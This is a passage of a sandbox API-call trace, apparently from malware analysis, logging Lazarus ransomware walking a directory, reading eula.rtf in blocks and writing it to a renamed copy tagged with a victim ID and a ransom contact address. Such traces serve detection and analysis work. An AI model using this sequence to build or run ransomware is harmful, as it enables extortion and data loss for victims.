(HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78710 [0067.616] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x78710, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1041") returned 27 [0067.616] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041" (normalized: "c:\\588bce7c90097ed212\\1041"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.616] GetLastError () returned 0x5 [0067.616] GetLastError () returned 0x5 [0067.616] SetLastError (dwErrCode=0x5) [0067.616] GetLastError () returned 0x5 [0067.616] SetLastError (dwErrCode=0x5) [0067.616] GetLastError () returned 0x5 [0067.616] SetLastError (dwErrCode=0x5) [0067.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78710 | out: hHeap=0x20000) returned 1 [0067.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0067.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0067.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0067.616] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.616] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.616] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.616] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0067.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0067.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0067.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0067.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0067.616] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="1042", cAlternateFileName="")) returned 1 [0067.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0067.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0067.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0067.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0067.617] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\1041\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78710 [0067.617] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.617] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x278d, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0067.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0067.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0067.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0067.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0067.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0067.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0067.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0067.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0067.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0067.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0067.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0067.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46a58 [0067.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0067.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0067.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0067.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0067.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0067.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0067.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0067.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0067.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0067.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0067.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0067.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0067.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x715b8 [0067.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0067.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0067.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0067.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0067.618] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.618] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.618] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.618] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0067.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0067.618] AreFileApisANSI () returned 1 [0067.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1041\\eula.rtf", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1041\\eula.rtf", lpUsedDefaultChar=0x0) returned 36 [0067.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0067.618] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.618] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0067.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0067.618] AreFileApisANSI () returned 1 [0067.618] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0067.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69490 [0067.618] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x69490, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1041\\eula.rtf") returned 36 [0067.618] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0067.618] GetFileType (hFile=0x410) returned 0x1 [0067.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69490 | out: hHeap=0x20000) returned 1 [0067.619] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0067.619] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0067.619] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0067.619] CloseHandle (hObject=0x410) returned 1 [0067.619] AreFileApisANSI () returned 1 [0067.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0067.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0067.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1041\\eula.rtf") returned 36 [0067.619] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0067.619] GetFileType (hFile=0x410) returned 0x1 [0067.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0067.620] CloseHandle (hObject=0x410) returned 1 [0067.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0067.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0067.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0067.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0067.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0067.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0067.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0067.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0067.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0067.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0067.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0067.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0067.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0067.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0067.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0067.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0067.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0067.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0067.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0067.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0067.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0067.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0067.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0067.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0067.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0067.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0067.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0067.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0067.621] AreFileApisANSI () returned 1 [0067.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0067.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0067.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1041\\eula.rtf") returned 36 [0067.621] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1041\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x278d)) returned 1 [0067.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0067.621] AreFileApisANSI () returned 1 [0067.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0067.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0067.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0067.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0067.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0067.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0067.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0067.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0067.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0067.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0067.621] GetLastError () returned 0x0 [0067.621] SetLastError (dwErrCode=0x0) [0067.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e1f0 [0067.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x8c430 [0067.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8be28 [0067.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5b8 [0067.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5d0 [0067.621] GetLastError () returned 0x0 [0067.621] SetLastError (dwErrCode=0x0) [0067.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0067.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0067.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x68d60 [0067.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0067.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76200 [0067.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0067.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0067.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0067.622] AreFileApisANSI () returned 1 [0067.622] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76200, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 98 [0067.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc4) returned 0x51398 [0067.622] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76200, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=98 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1041\\eula.rtf.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 98 [0067.622] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\eula.rtf.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0067.671] GetFileType (hFile=0x410) returned 0x1 [0067.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0067.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0067.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0067.671] AreFileApisANSI () returned 1 [0067.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0067.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0067.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1041\\eula.rtf") returned 36 [0067.672] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0067.672] GetFileType (hFile=0x420) returned 0x1 [0067.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0067.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69bb0 [0067.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0067.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0067.672] GetLastError () returned 0x0 [0067.672] SetLastError (dwErrCode=0x0) [0067.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0067.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0067.672] GetLastError () returned 0x0 [0067.672] SetLastError (dwErrCode=0x0) [0067.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0067.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0067.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x84fb8 [0067.672] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0067.891] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0067.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4c8 [0067.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x85fc0 [0067.892] GetLastError () returned 0x0 [0067.892] SetLastError (dwErrCode=0x0) [0067.892] GetLastError () returned 0x0 [0067.892] SetLastError (dwErrCode=0x0) [0067.892] GetLastError () returned 0x0 [0067.892] SetLastError (dwErrCode=0x0) [0067.892] GetLastError () returned 0x0 [0067.892] SetLastError (dwErrCode=0x0) [0067.892] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.893] WriteFile (in: hFile=0x410, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.894] GetLastError () returned 0x0 [0067.894] SetLastError (dwErrCode=0x0) [0067.894] GetLastError () returned 0x0 [0067.894] SetLastError (dwErrCode=0x0) [0067.895] GetLastError () returned 0x0 [0067.895] SetLastError (dwErrCode=0x0) [0067.895] GetLastError () returned 0x0 [0067.895] SetLastError (dwErrCode=0x0) [0067.895] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x78d, lpOverlapped=0x0) returned 1 [0067.895] WriteFile (in: hFile=0x410, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.895] GetLastError () returned 0x0 [0067.895] SetLastError (dwErrCode=0x0) [0067.895] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0067.895] GetLastError () returned 0x0 [0067.895] SetLastError (dwErrCode=0x0) [0067.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd) returned 0x7d510 [0067.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0067.896] GetLastError () returned 0x0 [0067.896] SetLastError (dwErrCode=0x0) [0067.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4c8 | out: hHeap=0x20000) returned 1 [0067.896] WriteFile (in: hFile=0x410, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x790, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327ef70*=0x790, lpOverlapped=0x0) returned 1 [0067.896] GetLastError () returned 0x0 [0067.896] SetLastError (dwErrCode=0x0) [0067.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d510 | out: hHeap=0x20000) returned 1 [0067.896] GetLastError () returned 0x0 [0067.896] SetLastError (dwErrCode=0x0) [0067.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0067.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0067.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0067.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0067.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: 